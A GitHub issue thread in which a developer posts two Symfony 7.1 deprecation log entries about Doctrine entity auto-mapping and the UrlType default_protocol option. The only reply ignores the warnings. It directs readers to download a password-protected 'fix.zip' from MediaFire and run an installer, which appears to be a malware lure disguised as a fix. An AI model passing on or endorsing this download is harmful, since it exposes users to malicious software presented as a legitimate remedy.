### ISSUE TITLE
Minor deprecations

### ISSUE THREAD

**Issue by pmdevelopment** [wirDesign-communication-AG/wirhub-app#1018]
{"message":"User Deprecated: Since symfony/doctrine-bridge 7.1: Relying on auto-mapping for Doctrine entities is deprecated for argument $file of \"AppBundle\\Controller\\FileController::get\": declare the identifier using either the #[MapEntity] attribute or mapped route parameters.","context":{"exception":{"class":"ErrorException","message":"User Deprecated: Since symfony/doctrine-bridge 7.1: Relying on auto-mapping for Doctrine entities is deprecated for argument $file of \"AppBundle\\Controller\\FileController::get\": declare the identifier using either the #[MapEntity] attribute or mapped route parameters.","code":0,"file":"/var/www/wirhub/vendor/symfony/doctrine-bridge/ArgumentResolver/EntityValueResolver.php:180"}},"level":200,"level_name":"INFO","channel":"deprecation","datetime":"2024-08-26T09:26:39.558527+02:00","extra":{}}

    {"message":"User Deprecated: Since symfony/form 7.1: Not configuring the \"default_protocol\" option when using the UrlType is deprecated. It will default to \"null\" in 8.0.","context":{"exception":{"class":"ErrorException","message":"User Deprecated: Since symfony/form 7.1: Not configuring the \"default_protocol\" option when using the UrlType is deprecated. It will default to \"null\" in 8.0.","code":0,"file":"/var/www/wirhub/vendor/symfony/form/Extension/Core/Type/UrlType.php:43"}},"level":200,"level_name":"INFO","channel":"deprecation","datetime":"2024-08-27T11:21:36.902106+02:00","extra":{}}

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
